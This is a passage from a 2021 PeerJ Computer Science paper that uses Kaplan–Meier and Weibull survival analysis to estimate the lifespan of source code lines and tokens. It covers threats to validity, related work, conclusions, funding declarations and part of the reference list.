rewrites Table 2 Languages and Kaplan–Meier (KM) estimates. Language # Projects Median Median Line KM Token KM PHP 16 1.93 2.42 C++ 17 1.86 2.81 Python 12 2.75 3.61 Java 18 2.45 2.74 C 25 2.80 3.63 Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 20/33 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ performed after the code was written, and errors introduced when one type of repository (e.g., CVS) gets converted into Git. Third-party code changes can have a significant effect on software evolution. Gall et al. (1997) conducted an empirical study on a large telecommunication switching system, and identified important differences in the patterns of software evolution over time of the whole system vs its subsystems. A similar strategy of separately examining the growth of subsystems of large software projects has been followed by González-Barahona et al. (2014) and by González-Barahona et al. (2009). Other studies of software evolution have also identified the ripples caused by the inclusion or removal of third-party components (Robles, González-Barahona & Herraiz, 2005), and some, such as the one by Hatton, Spinellis & Van Genuchten (2017), have attempted to address the issue by filtering them out. As we have not performed such filtering, these changes may affect our reported results. On the other hand, filtering introduces another threat to validity due to the subjective nature of the required decisions or parameters. A related factor is the granularity of the studied commits. Our study is missing many intermediary commits, first because we removed about 32% through history simplification, and second because many others may have occurred in third-party repositories and then pushed upstream as a single commit (German, Adams & Hassan, 2016). One could argue that the effects of history simplification should cancel out: lines would on average appear later and also disappear later. Nevertheless, to quantify the effect of history simplification, we measured the interval between commits in both the complete tree and the simplified longest path. As expected, the longer time paths upstream from merges in the complete tree, which were simplified away in the linear path, gave the tree a longer interval between commits (a median of 40 min) than its longest path (27 min). However, the difference between the median value of the two intervals (13 min) is five orders of magnitude smaller than the line lifespan we report, making any effect negligible. The use of Git to list the differences between two file versions is also a threat. First, the employed file difference algorithm (Myers, 1986) will display a movement of code as a deletion and an insertion. Then, relatively minor changes, such as the renaming of an identifier, will appear as line deletions and insertions, which may skew the results toward higher infant mortality. We examined the effect of these two issues through methods described in the sections on the analysis of individual tokens and moved lines. Also, the detection of file renaming and copying is based on a heuristic and a threshold. We used the default thresholds, only increasing the number of files that would be checked for copies; there may conceivably be better values to use. A related issue is that our investigation focuses on individual code lines. We do not take context into account. A line that is moved from one place to the next impacts both places and may cause cascading changes in the lifespans of other lines. However, the same applies in traditional survival analysis: deaths may be related to other deaths (e.g., via disease); we are interested in the lifespan of lines, no matter the relationships that may exist between them. Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 21/33 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ Given that we used custom-developed tools to track the birth and death of lines of code, human error is an inevitable factor. We tried to minimize this through numerous test cases, manual verification, and the use of internal consistency checks. Turning to our statistical methods, we have used two statistical techniques to answer two different, but related questions. We used the Kaplan–Meier estimator to investigate the median lifespan of code in projects, and a Weibull process to investigate the overall aging process. The Kaplan–Meier estimator provided us with approximations of the survival functions, while the Weibull fit gave us approximations of the hazard functions. We assumed that the hazard rate is characterized by a Weibull function, because the Weibull distribution is a popular model for several related process such as component failure rates and Weibull covers different aging processes depending on the value of a. Moreover, we are not interested in the exact values of the parameters of the Weibull distribution, but in the relation of a to 1, where we found consistent results. The remarkable agreement in the shape of the Weibull distributions among many diverse projects (Fig. 6) leads us to believe that our findings are reproducible and generalizable. We examined whether the lognormal distribution, which is also often used in failure models, would be a better fit for our data. To compare the two models, Weibull and lognormal, we used the Akaike Information Criterion (AIC), defined as AIC ¼ 2k � 2 logðL̂Þ, where k is the number of parameters of the model and L̂ is the maximum likelihood of the model. A lower AIC value corresponds to a better fit, as this maximizes the goodness of fit, given by the log-likelihood, but penalizes the complexity of the model, given by the number of parameters. We found overwhelmingly that the Weibull distribution was a better fit. Only five projects had better fit with the lognormal distribution when we examined the lines, and six projects had better fit with the lognormal distribution when we examined the tokens (four projects were the same). We used the Python lifelines package for calculating the estimates and comparing the distributions (Davidson-Pilon et al., 2020). External validity The generalizability of our findings is threatened by our choice of analyzed projects. Although we included projects from diverse development communities, written in numerous programing languages, and serving many different application areas, we cannot claim that our choice represents adequately all software development. In particular, we feel that our sample excludes or underrepresents the following software types: small software projects, projects developed with tightly managed or formal processes, proprietary and bespoke systems, projects written in programing languages not favored by the open source community, and systems that target specific application domains rather than the provision of systems infrastructure. More importantly, our findings are based on large, successful projects that have run for several years. There are many more projects that are discontinued after a short period of time, for any reason. All lines of code in these projects freeze at an early stage of what could have been a longer period of evolution. Therefore our findings cannot be generalized to all software development—this would be an instance of survival bias, Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 22/33 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ reaching conclusions for all the population based only on the characteristics of the survivors. That said, people usually aspire to create successful, long-lasting projects, so our findings are pertinent for those projects that want to achieve longevity. RELATED WORK All living beings degenerate and die with age. The origin of senescence, however, remains an unsolved problem for biologists (Kirkwood & Austad, 2000). Likewise, many software components evolve, age, and are eventually removed or replaced. This section presents related work regarding the fields of software evolution, aging, and decay, and records empirical studies that use the statistical method of survival analysis (Elandt-Johnson & Johnson, 1990; Klein & Moeschberger, 2003). The process of software evolution refers to the modification and adaptation of software programs so that programs can survive as their environment changes. The software evolution laws of Lehman (1980) describe the constraints practitioners should take into account to continuously adapt actively used software systems. A detailed literature review regarding Lehman’s software evolution laws has been conducted by Herraiz et al. (2013). Many empirical studies focus on predictive models of software projects’ evolution at macroscopic scale. Relevant studies have looked at long-term sustainability factors in the evolution of LibreOffice (Gamalielsson & Lundell, 2014), the change of program dependencies in the Apache ecosystem (Bavota et al., 2013), and the early identification of source code evolution pattern in open source projects (Karus, 2013). Additionally, many empirical studies examine software evolution at the microscopic level, considering the evolution of source-code elements such as methods. In particular, Bevan et al. (2005) developed Kenyon, which supports different types of stratigraphic software evolution research, ranging from code feature evolution to dependency graph-based maintenance. Zimmermann (2006) presented APFEL for fine-grained processing of source code elements such as tokens, method calls, exceptions, and variable usages. Hata, Mizuno & Kikuno (2011) introduced Historage, which provides entire histories of fine-grained entities in Java, such as methods, constructors, and fields. This tool has been applied to quantitatively evaluate the remaining change identification of open source software projects. The term software aging was coined by Parnas (1994) and refers to the idea that programs, like people, are getting old. According to Parnas, software aging happens for two reasons: (1) software fails to adapt to changing needs, and (2) software changes but in an inappropriate way (addition of bad fixes and features). Given, however, that it is infeasible for developers to prevent software evolution and, consequently, software degradation, researchers attempt to limit program damages by predicting the software’s lifetime and inventing rejuvenation approaches (Karus & Dumas, 2012; Li et al., 2011; Qin et al., 2005; Robillard & Murphy, 2007; Salfner, Lenk & Malek, 2010). In the field of software aging, empirical studies have been conducted on the identification of aging trends. In particular, Robles et al. (2005) found that a system becomes “old” when it turns five. The authors also defined the absolute 5-year aging index to compare the relative aging of different projects. Finally, Cotroneo, Natella & Pietrantuono (2013) developed an approach that predicts the location of aging-related bugs using software complexity Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 23/33 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ metrics and machine learning algorithms. They found that the most significant signs of software aging manifest themselves as: leaked memory, unterminated threads, unreleased files and locks, numerical errors, and disk fragmentation. As software evolves, developers should overcome software erosion by fighting software decay. A significant research body is also devoted to this field. Eick et al. (2001) used the term code decay to describe the situation where evolving software increasingly hinders software maintenance. The authors, also, proposed measurements (code decay indices) as decay predictors. For their study, they statically analyzed millions of lines of a fifteen-year old telephone switching software system. Similarly to our work, the authors tracked added and deleted source code lines. However, they did not use survival analysis and they examined a single project to find particular code decay factors. Additionally, Arisholm & Sjøberg (2000) proposed a framework for the empirical assessment of changeability decay and Araújo, Monteiro & Travassos (2012) built a software decay model regarding software deterioration causes. Extensive work has been done on identifying and tracking code changes. Kim & Notkin (2006) were the first that defined the problem of matching code elements between two program versions based on syntactic and textual similarity. To compute the difference between two programs several tools have been implemented. Canfora, Cerulo & Penta (2007) developed a technique that combines Space Vector Models and the Levenshtein edit distance for finding CVS/SVN differences that occur due to line additions or deletions, as well as due to line modifications. Furthermore, the LHDiff tool implements language- independent techniques to track how source code lines evolve across different versions of a software system (Asaduzzaman et al., 2013b). The tool uses the simhash technique together with heuristics. In addition, the GumTree tool identifies edits in scripts when moving code in version repositories (Falleri et al., 2014). This tool is based on a abstract syntax tree (AST) differencing algorithm. The ChangeDistiller is another differencing tool that is based on a tree differencing algorithm for fine-grained source code change extraction (Fluri et al., 2007). To represent how lines evolve over time in source code version repositories researchers have also used annotation graphs (Zimmermann et al., 2006). More recently, Servant & Jones (2017) proposed a fine-grained model based on optimizing the Levenshtein difference between lines of successive versions. Finally, CVSscan is a visual tool for representing software evolution based on the tracking of line-based source code changes extracted by using Unix’s diff (Voinea, Telea & Van Wijk, 2005). The lifetime tool we present here, balances computational cost with accuracy by processing a series of git diff outputs and uses a state machine for the parsing of their output. Other researchers have also employed the tools of survival analysis in software (Elandt-Johnson & Johnson, 1990; Klein & Moeschberger, 2003). Sentas, Angelis & Stamelos (2008) developed a statistical framework based on survival analysis and the Kaplan–Meier estimator (Kaplan & Meier, 1958) to predict the duration of software projects and the factors that affect it. The authors applied their approach on proprietary software projects taking into account industrial factors that have an impact on a project’s lifetime. They found that the median duration of the examined projects is 14 months. Similarly, Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 24/33 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ Samoladas, Angelis & Stamelos (2010) applied survival analysis on 1,147 open source projects to forecast software evolution trends. The authors observed that projects that existed more than ten years ago continue to evolve. Comparably, our insights confirm that code in long-lived projects lives longer. Scanniello (2011) used the Kaplan–Meier estimator on five software projects (at method level) to investigate how dead code affects software evolution. Our finding regarding the lower hazard of older lines is mirrored by Zheng et al. (2008) who report that in Gentoo Linux packages, a network graph new node is connected to an old node with a probability that depends not only on the degree but also on the age of the old node. Other survival analysis studies include the one by Claes et al. (2015) on the longevity of Debian packages with conflicts and the one by Goeminne & Mens (2015) on the survival and influence of five Java database frameworks. To the best of our knowledge, this article is the first work that uses survival analysis to track the birth and death of code lines and tokens over periods that span decades, and presents a theoretical and statistical model regarding the aging process of code lines. Another research strand that the study of the evolution of fine-grained code elements is related to includes genetic improvement. Genetic improvement (GI) uses automated search (i.e., optimization and machine learning techniques) in order to improve existing software. Typically, GI involves making small changes or edits (also known as mutations) in source-code elements (i.e., lines of code or tokens) to improve existing software. Topics covered by GI research include program transformation, approximate computing, and program repair (Petke et al., 2018). As an example, Petke et al. (2014) apply GI with automated code transplantation, by mutating the code at the level of lines of source code, to improve software performance. Additionally, Barr et al. (2014) introduced the plastic surgery hypothesis, which states that changes to a codebase refer to source code elements that already exist in the codebase at the time of a change. Related work (Nguyen et al., 2013; Goues, Forrest & Weimer, 2013) considers repetitiveness of code changes (abstracted to abstract syntax trees) that is associated with the plastic surgery hypothesis. Furthermore, Martinez, Weimer & Monperrus (2014) consider changes that could be constructed based on existing code snippets. Therefore, the study of the evolution of code elements, such as code lines or tokens that we take into account here, could help, in the future, in the guidance of software improvement based on evolutionary approaches. CONCLUSIONS AND IMPLICATIONS When we began working on this study, we did not know whether code lines were durable or perishable and whether their demise was a result of infant mortality or senescence. By devising a method and implementing tools to follow source code lines from 89 revision control repositories from their birth to their demise, we were able to arrive at the answers through the statistical analysis of 3.3 billion source code lifetime events. We found that code lines are durable with a median lifespan of about 2.4 years, the corresponding median for the tokens is 2.9 years, and that the associated hazard rate decreases over time following a Weibull distribution; that is, young lines are more likely to Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 25/33 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ be modified or deleted. We investigated whether line and token longevity are associated with particular line and token features, developer experience and tenure in a project, and programing language. Our results did not show strong patterns, indicating that line and token longevity may be the result of a complex interaction of various, potentially context specific, factors. Project age and project size had a small correlation with code longevity. On the practical front, our model, suitably calibrated, can provide input for estimating maintenance effort, while the corresponding tool could aid the management of technical debt and the risk assessment of software vulnerabilities. Our model derives statistical estimates of lifespan estimates and hazard rates, based on the source code of projects. They can be run on other projects, apart from the ones we used, to give the calibrated figures for them. Knowing how lines and token age (or churn) in a project may help in managing technical debt and risk assessment (Ozment & Schechter, 2006; Shin et al., 2010). For example, a large number of long-lived lines/tokens can be a sign of stability or “don’t touch” status. Moreover, our regression model of lines lifespan vs project lifespan can be used against a particular project to gauge where it stands, or whether (perhaps problematically) it is an outlier. All these potential uses need to be empirically validated in future studies. On the research front, the study of code evolution at the level of individual lines can be extended both theoretically and in empirical breadth and depth. On the theoretical side, significant work is required to establish the precise mechanisms underlying the observed hazard rate. Features we did not examine here, such as as the interplay of requirements, architecture, and syntax, might be worthy candidates for further study. Corresponding theories should then be empirically evaluated using our methods and tools. On the breadth side examining more, and more diverse, repositories will strengthen the generalizability of our findings. Tying together this area’s research and practical implications is the enticing quest to identify and control factors that do play a role in the lifetime of code elements. Once these are nailed down, software engineering practices can be correspondingly adjusted so as to reduce potentially wasteful effort by delivering code lines with longer lifespans. This line of research can lead to a new promising and exciting avenue for improving the efficiency of software development. ACKNOWLEDGEMENTS The authors thank Alexander Chatzigeorgiou for his valuable and timely feedback. This work’s first author thanks Michiel van Genuchten and Les Hatton for their fruitful collaboration on software growth modeling. ADDITIONAL INFORMATION AND DECLARATIONS Funding The project associated with this work has received funding from the European Union’s Horizon 2020 research and innovation program under grant agreement No. 825328. Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 26/33 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: European Union’s Horizon: 825328. Competing Interests The authors declare that they have no competing interests. Author Contributions � Diomidis Spinellis conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Panos Louridas analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Maria Kechagia analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data and source code are available on Zenodo: DOI 10.5281/zenodo.4319993. - Spinellis, Diomidis, Louridas, Panos, & Kechagia, Maria. (2020). Evolution of software code at the level of fine-grained elements: data files (Version 1.3) [Data set]. Zenodo. DOI 10.5281/zenodo.4319986. - Kechagia, Maria, Louridas, Panos, & Kechagia, Maria. (2020, December 13). Evolution of software code at the level of fine-grained elements: source code. Zenodo. DOI 10.5281/zenodo.4319993. REFERENCES Albrecht AJ, Gaffney JE. 1983. Software function, source lines of code, and development effort prediction: a software science validation. IEEE Transactions on Software Engineering SE-9(6):639–648 DOI 10.1109/TSE.1983.235271. Allamanis M, Barr ET, Devanbu P, Sutton C. 2018. A survey of machine learning for big code and naturalness. ACM Computing Surveys 51(4):1–37 DOI 10.1145/3212695. Alon U, Zilberstein M, Levy O, Yahav E. 2019. Code2Vec: learning distributed representations of code. Proceedings of the ACM on Programming Languages 3(POPL):1–29 DOI 10.1145/3290353. Araújo MAP, Monteiro VF, Travassos GH. 2012. Towards a model to support in silico studies of software evolution. In: Proceedings of the 2012 ACM-IEEE International Symposium on Empirical Software Engineering and Measurement, ESEM ’12. 281–289. Arisholm E, Sjøberg DIK. 2000. Towards a framework for empirical assessment of changeability decay. Journal of Systems and Software 53(1):3–14 DOI 10.1016/S0164-1212(00)00003-0. Asaduzzaman M, Roy CK, Schneider KA, Di Penta M. 2013a. LHDiff: a language-independent hybrid approach for tracking source code lines. In: ICSM 2013: 29th IEEE International Conference on Software Maintenance. Piscataway: IEEE, 230–239. Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 27/33 https://dx.doi.org/10.5281/zenodo.4319993 http://dx.doi.org/10.5281/zenodo.4319986 http://dx.doi.org/10.5281/zenodo.4319993 http://dx.doi.org/10.1109/TSE.1983.235271 http://dx.doi.org/10.1145/3212695 http://dx.doi.org/10.1145/3290353 http://dx.doi.org/10.1016/S0164-1212(00)00003-0 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ Asaduzzaman M, Roy CK, Schneider KA, Penta MD. 2013b. LHDiff: tracking source code lines to support software maintenance activities. In: 2013 IEEE International Conference on Software Maintenance. 484–487. Atkins DL, Ball T, Graves TL, Mockus A. 2002. Using version control data to evaluate the impact of software tools: a case study of the Version Editor. IEEE Transactions on Software Engineering 28(7):625–637 DOI 10.1109/TSE.2002.1019478. Barnes JM, Pandey A, Garlan D. 2013. Automated planning for software architecture evolution. In: 28th IEEE/ACM International Conference on Automated Software Engineering (ASE ’13). 213–223. Barr ET, Brun Y, Devanbu P, Harman M, Sarro F. 2014. The plastic surgery hypothesis. In: Proceedings of the 22nd ACM SIGSOFT International Symposium on Foundations of Software Engineering, FSE 2014. New York: Association for Computing Machinery, 306–317. Bavota G, Canfora G, Penta MD, Oliveto R, Panichella S. 2013. The evolution of project inter-dependencies in a software ecosystem: the case of Apache. In: Proceedings of the 29th IEEE International Conference on Software Maintenance, ICSM ’13. Washington: IEEE Computer Society, 280–289. Bevan J, Whitehead EJ, Kim S, Godfrey M. 2005. Facilitating software evolution research with Kenyon. In: Proceedings of the 10th European Software Engineering Conference Held Jointly with 13th ACM SIGSOFT International Symposium on Foundations of Software Engineering, ESEC/FSE-13. New York: Association for Computing Machinery, 177–186. Breivold HP, Crnkovic I, Larsson M. 2012. A systematic review of software architecture evolution research. Information and Software Technology 54(1):16–40 DOI 10.1016/j.infsof.2011.06.002. Buse RP, Weimer WR. 2008. A metric for software readability. In: Proceedings of the 2008 International Symposium on Software Testing and Analysis, ISSTA ’08. New York: ACM, 121–130. Canfora G, Cerulo L, Penta MD. 2007. Identifying changed source code lines from version repositories. In: Proceedings of the 4th International Workshop on Mining Software Repositories, MSR ’07. Washington, D.C: IEEE Computer Society, 14. Claes M, Mens T, Di Cosmo R, Vouillon J. 2015. A historical analysis of Debian package incompatibilities. In: Proceedings of the 12th Working Conference on Mining Software Repositories, MSR ’15. Piscataway: IEEE Press, 212–223. Cotroneo D, Natella R, Pietrantuono R. 2013. Predicting aging-related bugs using software complexity metrics. Performance Evaluation 70(3):163–178 DOI 10.1016/j.peva.2012.09.004. Davidson-Pilon C, Kalderstam J, Jacobson N, Sean R, Kuhn B, Zivich P, Williamson M, Abdeali JK, Datta D, Fiore-Gartland D, Parij A, WIlson A, Gabriel D, Moneda L, Moncada-Torres A, Stark K, Gadgil H, Jona S, Besson K, Peña MS, Anton S, Klintberg A, Growth J, Noorbakhsh J, Begun M, Kumar R, Hussey S, Golland D, jlim13. 2020. Camdavidsonpilon/lifelines: v0.25.6. DOI 10.5281/zenodo.4136578. Kaplan EL, Meier P. 1958. Nonparametric estimation from incomplete observations. Journal of the American Statistical Association 53(282):457–481 DOI 10.1080/01621459.1958.10501452. Eick SG, Graves TL, Karr AF, Marron JS, Mockus A. 2001. Does code decay? Assessing the evidence from change management data. IEEE Transactions on Software Engineering 27(1):1–12 DOI 10.1109/32.895984. Elandt-Johnson RC, Johnson NL. 1990. Survival models and data analysis. Hoboken: Wiley. Falleri J-R, Morandat F, Blanc X, Martinez M, Monperrus M. 2014. Fine-grained and accurate source code differencing. In: Proceedings of the 29th ACM/IEEE International Conference on Automated Software Engineering, ASE ’14, New York: ACM, 313–324. Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 28/33 http://dx.doi.org/10.1109/TSE.2002.1019478 http://dx.doi.org/10.1016/j.infsof.2011.06.002 http://dx.doi.org/10.1016/j.peva.2012.09.004 http://dx.doi.org/10.5281/zenodo.4136578 http://dx.doi.org/10.1080/01621459.1958.10501452 http://dx.doi.org/10.1109/32.895984 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ Fluri B, Wuersch M, PInzger M, Gall H. 2007. Change distilling: tree differencing for fine-grained source code change extraction. IEEE Transactions on Software Engineering 33(11):725–743 DOI 10.1109/TSE.2007.70731. Fowler M. 2000. Refactoring: improving the design of existing code. Boston: Addison-Wesley. Gall H, Jazayeri M, Klosch RR, Trausmuth G. 1997. Software evolution observations based on product release history. In: 1997 Proceedings International Conference on Software Maintenance. 160–166. Gamalielsson J, Lundell B. 2014. Sustainability of open source software communities beyond a fork: how and why has the LibreOffice project evolved? Journal of Systems and Software 89:128–145 DOI 10.1016/j.jss.2013.11.1077. German DM, Adams B, Hassan AE. 2016. Continuously mining distributed version control systems: an empirical study of how Linux uses Git. Empirical Software Engineering 21(1):260–299 DOI 10.1007/s10664-014-9356-2. German DM, Adams B, Stewart K. 2019. cregit: token-level blame information in git version control repositories. Empirical Software Engineering 24:2725–2763. Giger E, Pinzger M, Gall HC. 2011. Comparing fine-grained source code changes and code churn for bug prediction. In: Proceedings of the 8th Working Conference on Mining Software Repositories, MSR ’11. New York: ACM, 83–92. Godfrey MW, Tu Q. 2000. Evolution in open source software: a case study. In: Proceedings of the 2000 International Conference on Software Maintenance, ICSM ’00. Piscataway: IEEE, 131–142. Goeminne M, Mens T. 2015. Towards a survival analysis of database framework usage in Java projects. In: Proceedings of the 31st IEEE International Conference on Software Maintenance and Evolution. 551–555. González-Barahona JM, Robles G, Herraiz I, Ortega F. 2014. Studying the laws of software evolution in a long-lived FLOSS project. Journal of Software: Evolution and Process 26(7):589–612 DOI 10.1002/smr.1615. González-Barahona JM, Robles G, Michlmayr M, Amor JJ, German DM. 2009. Macro-level software evolution: a case study of a large software compilation. Empirical Software Engineering 14(3):262–285 DOI 10.1007/s10664-008-9100-x. Gordon AD, Henzinger TA, Nori AV, Rajamani SK. 2014. Probabilistic programming. In: Proceedings of the on Future of Software Engineering, FOSE 2014. New York: ACM, 167–181. Goues C, Forrest S, Weimer W. 2013. Current challenges in automatic software repair. Software Quality Journal 21(3):421–443 DOI 10.1007/s11219-013-9208-0. Gousios G, Kalliamvakou E, Spinellis D. 2008. Measuring developer contribution from software repository data. In: Proceedings of the 2008 International Working Conference on Mining Software Repositories, MSR ’08. New York: ACM, 129–132. Gousios G, Spinellis D. 2012. GHTorrent: GitHub’s data from a firehose. In: Lanza M, Penta MD, Xie T, eds. 9th IEEE Working Conference on Mining Software Repositories (MSR). Piscataway: IEEE, 12–21. Gousios G, Spinellis D. 2017. Mining software engineering data from GitHub. In: Proceedings of the 39th International Conference on Software Engineering Companion, ICSE-C ’17. Piscataway: IEEE Press, 501–502. Hata H, Mizuno O, Kikuno T. 2011. Historage: fine-grained version control system for Java. In: Proceedings of the 12th International Workshop on Principles of Software Evolution and the 7th Annual ERCIM Workshop on Software Evolution, IWPSE-EVOL ’11. New York: Association for Computing Machinery, 96–100. Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 29/33 http://dx.doi.org/10.1109/TSE.2007.70731 http://dx.doi.org/10.1016/j.jss.2013.11.1077 http://dx.doi.org/10.1007/s10664-014-9356-2 http://dx.doi.org/10.1002/smr.1615 http://dx.doi.org/10.1007/s10664-008-9100-x http://dx.doi.org/10.1007/s11219-013-9208-0 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ Hatton L, Spinellis D, Van Genuchten M. 2017. The long-term growth rate of evolving software: empirical results and implications. Journal of Software: Evolution and Process 29(5):e1847. Heckel P. 1978. A technique for isolating differences between files. Communications of the ACM 21(4):264–268 DOI 10.1145/359460.359467. Herraiz I, González-Barahona JM, Robles G. 2007. Towards a theoretical model for software growth. In: Proceedings of the 4th International Workshop on Mining Software Repositories, MSR ’07. Washington, DC: IEEE Computer Society, 21. Herraiz I, Rodriguez D, Robles G, González-Barahona JM. 2013. The evolution of the laws of software evolution: a discussion based on a systematic literature review. ACM Computing Surveys 46(2):28:1–28:28 DOI 10.1145/2543581.2543595. Humphrey WS. 1989. Managing the software process. Reading: Addison-Wesley. Ince D, Hatton L, Graham-Cumming J. 2012. The case for open program code. Nature 482(7386):485–488 DOI 10.1038/nature10836. Jiang S, Armaly A, McMillan C. 2017. Automatically generating commit messages from Diffs using neural machine translation. In: Proceedings of the 32Nd IEEE/ACM International Conference on Automated Software Engineering, ASE 2017. Piscataway: IEEE Press, 135–146. Kan SH. 2002. Metrics and models in software quality engineering. Second Edition. Boston: Addison-Wesley Longman Publishing Co., Inc. Karus S. 2013. Automatic means of identifying evolutionary events in software development. In: Proceedings of the 29th IEEE International Conference on Software Maintenance, ICSM ’13. Piscataway: IEEE, 412–415. Karus S, Dumas M. 2012. Code churn estimation using organisational and code metrics: An experimental comparison. Information and Software Technology 54(2):203–211 DOI 10.1016/j.infsof.2011.09.004. Kechagia M, Devroey X, Panichella A, Gousios G, van Deursen A. 2019. Effective and efficient API misuse detection via exception propagation and search-based testing. In: Proceedings of the 28th ACM SIGSOFT International Symposium on Software Testing and Analysis, ISSTA 2019. New York: ACM, 192–203. Kim M, Notkin D. 2006. Program element matching for multi-version program analyses. In: Proceedings of the 2006 International Workshop on Mining Software Repositories, MSR ’06. New York: ACM, 58–64. Kirkwood TB, Austad SN. 2000. Why do we age? Nature 408(6809):233–238 DOI 10.1038/35041682. Klein JP, Moeschberger ML. 2003. Survival analysis: techniques for censored and truncated data. Second Edition. Springer. Kruchten P, Nord RL, Ozkaya I. 2012. Technical debt: from metaphor to theory and practice. IEEE Software 29(6):18–21 DOI 10.1109/MS.2012.167. Lehman MM. 1978. Programs, cities, students—limits to growth? In: Gries D, ed. Programming Methodology: A Collection of Articles by Members of IFIP WG2.3. New York: Springer, 42–69. Lehman MM. 1980. Programs, life cycles, and laws of software evolution. Proceedings of the IEEE 68(9):1060–1076 DOI 10.1109/PROC.1980.11805. Li X, Li YF, Xie M, Ng SH. 2011. Reliability analysis and optimal version-updating for open source software. Information and Software Technology 53(9):929–936 DOI 10.1016/j.infsof.2011.04.005. Lind RK, Vairavan K. 1989. An experimental investigation of software metrics and their relationship to software development effort. IEEE Transanctions on Software Engineering 15(5):649–653 DOI 10.1109/32.24715. Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 30/33 http://dx.doi.org/10.1145/359460.359467 http://dx.doi.org/10.1145/2543581.2543595 http://dx.doi.org/10.1038/nature10836 http://dx.doi.org/10.1016/j.infsof.2011.09.004 http://dx.doi.org/10.1038/35041682 http://dx.doi.org/10.1109/MS.2012.167 http://dx.doi.org/10.1109/PROC.1980.11805 http://dx.doi.org/10.1016/j.infsof.2011.04.005 http://dx.doi.org/10.1109/32.24715 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ Løhre E, Jørgensen M. 2016. Numerical anchors and their strong effects on software development effort estimates. Journal of Systems and Software 116:49–56 DOI 10.1016/j.jss.2015.03.015. Mäntylä MV, Lassenius C. 2006. Subjective evaluation of software evolvability using code smells: an empirical study. Empirical Software Engineering 11(3):395–431. Martinez M, Weimer W, Monperrus M. 2014. Do the fix ingredients already exist? an empirical inquiry into the redundancy assumptions of program repair approaches. In: Companion Proceedings of the 36th International Conference on Software Engineering, ICSE Companion 2014. New York: Association for Computing Machinery, 492–495. Munaiah N, Kroh S, Cabrey C, Nagappan M. 2017. Curating GitHub for engineered software projects. Empirical Software Engineering 22(6):3219–3253 DOI 10.1007/s10664-017-9512-6. Myers EW. 1986. An O(ND) difference algorithm and its variations. Algorithmica 1(1–4):251–266 DOI 10.1007/BF01840446. Nguyen HA, Nguyen AT, Nguyen TT, Nguyen TN, Rajan H. 2013. A study of repetitiveness of code changes in software evolution. In: 28th IEEE/ACM International Conference on Automated Software Engineering (ASE). 180–190. Nguyen HV, Nguyen HA, Nguyen TT, Nguyen AT, Nguyen TN. 2012. Detection of embedded code smells in dynamic web applications. In: Proceedings of the 27th IEEE/ACM International Conference on Automated Software Engineering, ASE 2012. New York: Association for Computing Machinery, 282–285. Nugroho YS, Hata H, Matsumoto K. 2020. How different are different diff algorithms in Git? Empirical Software Engineering 25(1):790–823 DOI 10.1007/s10664-019-09772-z. Ozment A, Schechter SE. 2006. Milk or wine: does software security improve with age? In: Proceedings of the 15th Conference on USENIX Security Symposium. Berkeley: USENIX Association. Padgett WJ. 2011. Weibull distribution. In: Lovric M, ed. International Encyclopedia of Statistical Science. Berlin: Springer, 1651–1653. Parnas DL. 1994. Software aging. In: Proceedings of the 16th International Conference on Software Engineering, ICSE ’94. Los Alamitos: IEEE Computer Society Press, 279–287. Penta MD, Cerulo L, Aversano L. 2009. The life and death of statically detected vulnerabilities: an empirical study. Information and Software Technology 51(10):1469–1484 DOI 10.1016/j.infsof.2009.04.013. Petke J, Haraldsson SO, Harman M, Langdon WB, White DR, Woodward JR. 2018. Genetic improvement of software: a comprehensive survey. IEEE Transactions on Evolutionary Computation 22(3):415–432 DOI 10.1109/TEVC.2017.2693219. Petke J, Harman M, Langdon WB, Weimer W. 2014. Using genetic improvement and code transplants to specialise a C++ program to a problem class. In: Nicolau M, Krawiec K, Heywood MI, Castelli M, García-Sánchez P, Merelo JJ, Rivas Santos VM, Sim K, eds. Genetic Programming. Berlin: Springer, 137–149. Qin F, Tucek J, Sundaresan J, Zhou Y. 2005. Rx: treating bugs as allergies—a safe method to survive software failures. In: Proceedings of the 20th ACM Symposium on Operating Systems Principles, SOSP ’05. New York: ACM, 235–248. Robillard MP, Murphy GC. 2007. Representing concerns in source code. ACM Transactions on Software Engineering and Methodology 16(1):3 DOI 10.1145/1189748.1189751. Robles G, Amor JJ, Gonzalez-Barahona JM, Herraiz I. 2005. Evolution and growth in large libre software projects. In: Eighth International Workshop on Principles of Software Evolution (IWPSE’05). 165–174. Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 31/33 http://dx.doi.org/10.1016/j.jss.2015.03.015 http://dx.doi.org/10.1007/s10664-017-9512-6 http://dx.doi.org/10.1007/BF01840446 